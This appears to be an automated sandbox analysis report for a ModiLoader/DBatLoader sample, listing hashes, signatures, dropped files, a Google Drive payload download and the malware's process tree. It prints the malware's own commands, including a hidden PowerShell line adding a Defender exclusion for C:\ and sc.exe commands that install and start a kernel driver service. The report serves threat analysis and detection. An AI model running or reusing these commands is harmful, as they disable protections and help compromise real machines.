Analysis

  • max time kernel
    300s
  • max time network
    275s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/01/2025, 15:48 UTC

General

  • Target

    REQUIRED-ORDER-SETAILS.exe

  • Size

    973KB

  • MD5

    c67c61c88599a7c48fce6f41d2f824af

  • SHA1

    774d18c58980225ed4321ad479b0e7a45ab84efa

  • SHA256

    b307218533a96ecefbdab4fad0dec64baec07ef261e7985b899a4c43b1325892

  • SHA512

    3f155a898a5222339acc7ea69abe6d21f87647473f98a0ee88f12a6a41ee9fd615f3163a46d6518c31d5c8360586acf4c08798a2faa0e924bb7062a587fe14c8

  • SSDEEP

    24576:bBVRVxmQEkZkjSnbyewh+lMewKe9X7yxw7IYNoIjSst8H2se:bBmB+Q+SJwxw7IYNbjSi8H2se

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • ModiLoader Second Stage 61 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\REQUIRED-ORDER-SETAILS.exe
    "C:\Users\Admin\AppData\Local\Temp\REQUIRED-ORDER-SETAILS.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3228
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\MrtitfkxF.cmd" "
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4756
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Windows \SysWOW64\svchost.pif
        "C:\Windows \SysWOW64\svchost.pif"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1704
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
            5⤵
              PID:1608
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
              5⤵
                PID:1628
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
                5⤵
                  PID:2132
                • C:\Users\Public\alpha.pif
                  C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3152
                  • C:\Users\Public\Upha.pif
                    C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                    6⤵
                    • Executes dropped EXE
                    PID:3744
                • C:\Users\Public\alpha.pif
                  C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:4104
                  • C:\Users\Public\Upha.pif
                    C:\\Users\\Public\\Upha.pif start TrueSight
                    6⤵
                    • Executes dropped EXE
                    PID:4452
                • C:\Users\Public\alpha.pif
                  C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2276
                  • C:\Users\Public\aken.pif
                    C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4816
          • C:\Windows\SysWOW64\SndVol.exe
            C:\Windows\System32\SndVol.exe
            2⤵
              PID:1904
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 1820
              2⤵
              • Program crash
              PID:3252
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 1820
              2⤵
              • Program crash
              PID:392
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3228 -ip 3228
            1⤵
              PID:4060
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3228 -ip 3228
              1⤵
                PID:3036

              Network

              • flag-us
                DNS
                241.150.49.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                241.150.49.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                180.129.81.91.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                180.129.81.91.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                136.32.126.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                136.32.126.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                167.173.78.104.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                167.173.78.104.in-addr.arpa
                IN PTR
                Response
                167.173.78.104.in-addr.arpa
                IN PTR
                a104-78-173-167deploystaticakamaitechnologiescom
              • flag-us
                DNS
                232.168.11.51.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                232.168.11.51.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                drive.google.com
                REQUIRED-ORDER-SETAILS.exe
                Remote address:
                8.8.8.8:53
                Request
                drive.google.com
                IN A
                Response
                drive.google.com
                IN A
                172.217.169.78
              • flag-us
                DNS
                78.169.217.172.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                78.169.217.172.in-addr.arpa
                IN PTR
                Response
                78.169.217.172.in-addr.arpa
                IN PTR
                lhr48s09-in-f141e100net
              • flag-gb
                GET
                https://drive.google.com/uc?export=download&id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9
                REQUIRED-ORDER-SETAILS.exe
                Remote address:
                172.217.169.78:443
                Request
                GET /uc?export=download&id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9 HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: drive.google.com
                Response
                HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Mon, 20 Jan 2025 15:49:03 GMT
                Location: https://drive.usercontent.google.com/download?id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: script-src 'report-sample' 'nonce-kyzSnsWIfSZOMjF0o5HB-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              • flag-us
                DNS
                56.163.245.4.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                56.163.245.4.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                217.106.137.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                217.106.137.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                18.31.95.13.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                18.31.95.13.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                drive.usercontent.google.com
                REQUIRED-ORDER-SETAILS.exe
                Remote address:
                8.8.8.8:53
                Request
                drive.usercontent.google.com
                IN A
                Response
                drive.usercontent.google.com
                IN A
                216.58.212.193
              • flag-gb
                GET
                https://drive.usercontent.google.com/download?id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9&export=download
                REQUIRED-ORDER-SETAILS.exe
                Remote address:
                216.58.212.193:443
                Request
                GET /download?id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9&export=download HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: drive.usercontent.google.com
                Response
                HTTP/1.1 200 OK
                X-GUploader-UploadID: AFIdbgRBk3Z-yaENM-vnCFY9efKEqFkgB1IzW4dm8UIoGIv6CSRTo8UV8ZxQe5YyC0Lgm-nO
                Content-Type: application/octet-stream
                Content-Security-Policy: sandbox
                Content-Security-Policy: default-src 'none'
                Content-Security-Policy: frame-ancestors 'none'
                X-Content-Security-Policy: sandbox
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Embedder-Policy: require-corp
                Cross-Origin-Resource-Policy: same-site
                X-Content-Type-Options: nosniff
                Content-Disposition: attachment; filename="245_Mrtitfkxyga"
                Access-Control-Allow-Origin: *
                Access-Control-Allow-Credentials: false
                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                Accept-Ranges: bytes
                Content-Length: 2306980
                Last-Modified: Mon, 20 Jan 2025 06:23:59 GMT
                Date: Mon, 20 Jan 2025 15:49:10 GMT
                Expires: Mon, 20 Jan 2025 15:49:10 GMT
                Cache-Control: private, max-age=0
                X-Goog-Hash: crc32c=uGZrdA==
                Server: UploadServer
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              • flag-us
                DNS
                172.210.232.199.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                172.210.232.199.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                193.212.58.216.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                193.212.58.216.in-addr.arpa
                IN PTR
                Response
                193.212.58.216.in-addr.arpa
                IN PTR
                ams16s21-in-f11e100net
                193.212.58.216.in-addr.arpa
                IN PTR
                lhr25s27-in-f1�H
                193.212.58.216.in-addr.arpa
                IN PTR
                ams16s21-in-f193�H
              • flag-us
                DNS
                85.49.80.91.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                85.49.80.91.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                43.229.111.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                43.229.111.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                60.153.16.2.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                60.153.16.2.in-addr.arpa
                IN PTR
                Response
                60.153.16.2.in-addr.arpa
                IN PTR
                a2-16-153-60deploystaticakamaitechnologiescom
              • flag-us
                DNS
                25.173.189.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                25.173.189.20.in-addr.arpa
                IN PTR
                Response
              • 172.217.169.78:443
                drive.google.com
                REQUIRED-ORDER-SETAILS.exe
                236 B
                172 B
                5
                4
              • 172.217.169.78:443
                https://drive.google.com/uc?export=download&id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9
                tls, http
                REQUIRED-ORDER-SETAILS.exe
                1.4kB
                10.2kB
                14
                12

                HTTP Request

                GET https://drive.google.com/uc?export=download&id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9

                HTTP Response

                303
              • 216.58.212.193:443
                https://drive.usercontent.google.com/download?id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9&export=download
                tls, http
                REQUIRED-ORDER-SETAILS.exe
                46.9kB
                2.4MB
                954
                1748

                HTTP Request

                GET https://drive.usercontent.google.com/download?id=1ybYIpJOTlxbpbbqdmbvOcmqv2P6pqYa9&export=download

                HTTP Response

                200
              • 8.8.8.8:53
                241.150.49.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                241.150.49.20.in-addr.arpa

              • 8.8.8.8:53
                180.129.81.91.in-addr.arpa
                dns
                72 B
                147 B
                1
                1

                DNS Request

                180.129.81.91.in-addr.arpa

              • 8.8.8.8:53
                136.32.126.40.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                136.32.126.40.in-addr.arpa

              • 8.8.8.8:53
                167.173.78.104.in-addr.arpa
                dns
                73 B
                139 B
                1
                1

                DNS Request

                167.173.78.104.in-addr.arpa

              • 8.8.8.8:53
                232.168.11.51.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                232.168.11.51.in-addr.arpa

              • 8.8.8.8:53
                drive.google.com
                dns
                REQUIRED-ORDER-SETAILS.exe
                62 B
                78 B
                1
                1

                DNS Request

                drive.google.com

                DNS Response

                172.217.169.78

              • 8.8.8.8:53
                78.169.217.172.in-addr.arpa
                dns
                73 B
                112 B
                1
                1

                DNS Request

                78.169.217.172.in-addr.arpa

              • 8.8.8.8:53
                56.163.245.4.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                56.163.245.4.in-addr.arpa

              • 8.8.8.8:53
                217.106.137.52.in-addr.arpa
                dns
                73 B
                147 B
                1
                1

                DNS Request

                217.106.137.52.in-addr.arpa

              • 8.8.8.8:53
                18.31.95.13.in-addr.arpa
                dns
                70 B
                144 B
                1
                1

                DNS Request

                18.31.95.13.in-addr.arpa

              • 8.8.8.8:53
                drive.usercontent.google.com
                dns
                REQUIRED-ORDER-SETAILS.exe
                74 B
                90 B
                1
                1

                DNS Request

                drive.usercontent.google.com

                DNS Response

                216.58.212.193

              • 8.8.8.8:53
                172.210.232.199.in-addr.arpa
                dns
                74 B
                128 B
                1
                1

                DNS Request

                172.210.232.199.in-addr.arpa

              • 8.8.8.8:53
                193.212.58.216.in-addr.arpa
                dns
                73 B
                171 B
                1
                1

                DNS Request

                193.212.58.216.in-addr.arpa

              • 8.8.8.8:53
                85.49.80.91.in-addr.arpa
                dns
                70 B
                145 B
                1
                1

                DNS Request

                85.49.80.91.in-addr.arpa

              • 8.8.8.8:53
                43.229.111.52.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                43.229.111.52.in-addr.arpa

              • 8.8.8.8:53
                60.153.16.2.in-addr.arpa
                dns
                70 B
                133 B
                1
                1

                DNS Request

                60.153.16.2.in-addr.arpa

              • 8.8.8.8:53
                25.173.189.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                25.173.189.20.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbz4hcie.0ue.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Public\Libraries\FX.cmd

                Filesize

                8KB

                MD5

                7821e3de3812e791cf3b223500d73bc9

                SHA1

                5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

                SHA256

                3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

                SHA512

                6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

              • C:\Users\Public\Libraries\NEO.cmd

                Filesize

                55KB

                MD5

                3c755cf5a64b256c08f9bb552167975c

                SHA1

                8c81ca56b178ffd77b15f59c5332813416d976d7

                SHA256

                12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

                SHA512

                8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

              • C:\Users\Public\MrtitfkxF.cmd

                Filesize

                11KB

                MD5

                f82aeb3b12f33250e404df6ec873dd1d

                SHA1

                bcf538f64457e8d19da89229479cafa9c4cce12f

                SHA256

                23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

                SHA512

                6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

              • C:\Users\Public\Upha.pif

                Filesize

                70KB

                MD5

                3fb5cf71f7e7eb49790cb0e663434d80

                SHA1

                b4979a9f970029889713d756c3f123643dde73da

                SHA256

                41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

                SHA512

                2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

              • C:\Users\Public\aken.pif

                Filesize

                442KB

                MD5

                04029e121a0cfa5991749937dd22a1d9

                SHA1

                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                SHA256

                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                SHA512

                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

              • C:\Users\Public\alpha.pif

                Filesize

                283KB

                MD5

                8a2122e8162dbef04694b9c3e0b6cdee

                SHA1

                f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                SHA256

                b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                SHA512

                99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

              • C:\Windows \SysWOW64\netutils.dll

                Filesize

                116KB

                MD5

                0f088756537e0d65627ed2ea392dcaae

                SHA1

                983eb3818223641c13464831a2baad9466c3750f

                SHA256

                abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6

                SHA512

                d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d

              • C:\Windows \SysWOW64\svchost.pif

                Filesize

                94KB

                MD5

                869640d0a3f838694ab4dfea9e2f544d

                SHA1

                bdc42b280446ba53624ff23f314aadb861566832

                SHA256

                0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

                SHA512

                6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

              • memory/3228-52-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-30-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-15-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-23-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-35-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-54-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-65-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-64-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-63-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-62-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-61-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-60-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-58-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-57-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-53-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-50-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-49-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-47-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-66-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-59-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-39-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-38-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-37-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-56-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-36-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-55-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-34-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-4-0x0000000000400000-0x00000000004FC000-memory.dmp

                Filesize

                1008KB

              • memory/3228-51-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-33-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-32-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-48-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-31-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-8-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-46-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-45-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-29-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-44-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-28-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-43-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-42-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-27-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-41-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-26-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-40-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-25-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-24-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-22-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-21-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

              • memory/3228-20-0x00000000029E0000-0x00000000039E0000-memory.dmp

                Filesize

                16.0MB

